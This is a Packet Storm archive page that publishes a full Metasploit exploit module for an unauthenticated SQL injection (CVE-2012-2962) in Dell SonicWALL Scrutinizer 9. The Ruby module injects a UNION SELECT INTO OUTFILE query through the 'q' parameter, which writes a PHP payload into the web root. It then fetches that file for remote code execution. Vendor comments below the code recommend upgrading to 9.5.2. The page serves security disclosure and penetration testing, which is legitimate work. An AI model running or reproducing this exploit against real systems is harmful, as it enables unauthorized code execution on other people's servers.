accept no compromises

Dell SonicWALL Scrutinizer 9 SQL Injection

Dell SonicWALL Scrutinizer 9 SQL Injection
Posted Aug 3, 2012
Authored by muts, sinn3r, Devon Kearns | Site metasploit.com

This Metasploit module exploits a vulnerability found in Dell SonicWall Scrutinizer. While handling the 'q' parameter, the PHP application does not properly filter the user-supplied data, which can be manipulated to inject SQL commands, and then gain remote code execution. Please note that authentication is NOT needed to exploit this vulnerability.

tags | exploit, remote, php, code execution
advisories | CVE-2012-2962, OSVDB-84232
MD5 | 759e78201b01aab52f1b6d318bceac01

Dell SonicWALL Scrutinizer 9 SQL Injection

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => "Dell SonicWALL Scrutinizer 9 SQL Injection",
'Description' => %q{
This module exploits a vulnerability found in Dell SonicWall Scrutinizer.
While handling the 'q' parameter, the PHP application does not properly filter
the user-supplied data, which can be manipulated to inject SQL commands, and
then gain remote code execution. Please note that authentication is NOT needed
to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'muts',
'Devon Kearns',
'sinn3r'
],
'References' =>
[
['CVE', '2012-2962'],
['OSVDB', '84232'],
['EDB', '20033'],
['BID', '54625'],
['URL', 'http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
# According to advisory, version 9.5.1 and before are vulnerable.
# But was only able to test this on 9.0.1.0
['Dell SonicWall Scrutinizer 9.5.1 or older', {}]
],
'Privileged' => false,
'DisclosureDate' => "Jul 22 2012",
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The path to the SonicWall Scrutinizer\'s statusFilter file', '/d4d/statusFilter.php']),
OptString.new('HTMLDIR', [true, 'The HTML root directory for the web application', 'C:\\Program Files\\Scrutinizer\\html\\'])
], self.class)
end


def check
res = send_request_raw({'uri'=>target_uri.host})
if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and
res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/
return Exploit::CheckCode::Vulnerable
end

return Exploit::CheckCode::Safe
end


def exploit
peer = "#{rhost}:#{rport}"
p = "<?php #{payload.encoded} ?>"
hex_payload = p.unpack("H*")[0]
php_fname = Rex::Text.rand_text_alpha(5) + ".php"
rnd_txt = Rex::Text.rand_text_alpha_upper(3)

print_status("#{peer} - Sending SQL injection...")
res = send_request_cgi({
'uri' => target_uri.path,
'method' => 'POST',
'vars_post' => {
'commonJson' => 'protList',
'q' => "#{rnd_txt}' union select 0x#{hex_payload},0 into outfile '../../html/d4d/#{php_fname}'#"
}
})

if res and res.body !~ /No Results Found/
print_error("#{peer} - I don't think the SQL Injection attempt worked")
return
elsif not res
print_error("#{peer} - No response from the server")
return
end

# For debugging purposes, this is useful
vprint_status(res.to_s)

target_path = "#{File.dirname(target_uri.path)}/#{php_fname}"
print_status("#{peer} - Requesting: #{target_path}")
send_request_raw({'uri' => target_path})

handler
end
end

Comments (2)

RSS Feed Subscribe to this comment feed
jansijp

This vulnerability has been resolved in Dell SonicWALL Scrutinizer v9.5.2.

We recommend existing users of Dell SonicWALL Scrutinizer 9.5.0 and earlier versions upgrade to version 9.5.2 to prevent unauthorized queries from being run via the URL by authenticated users. Version 9.5.2 is available for download from www.mysonicwall.com. Users should log onto mySonicWALL and click on Downloads > Download Center in the navigation panel on the left, then select “Scrutinizer Software” in the Software Type drop down menu.

For further information see also this bulletin: www.sonicwall.com/shared/download/Del…

Comment by jansijp
2012-08-06 16:36:54 UTC | Permalink | Reply
jansijp

Also, please note that authentication is not required only when using Scrutinizer v9.0.1. The authentication issue was fixed in 9.5.0 and the SQL injection vulnerability in 9.5.2. We recommend upgrading to 9.5.2.

Comment by jansijp
2012-08-07 16:38:46 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    16 Files
  • 18
    Oct 18th
    15 Files
  • 19
    Oct 19th
    10 Files
  • 20
    Oct 20th
    7 Files
  • 21
    Oct 21st
    4 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close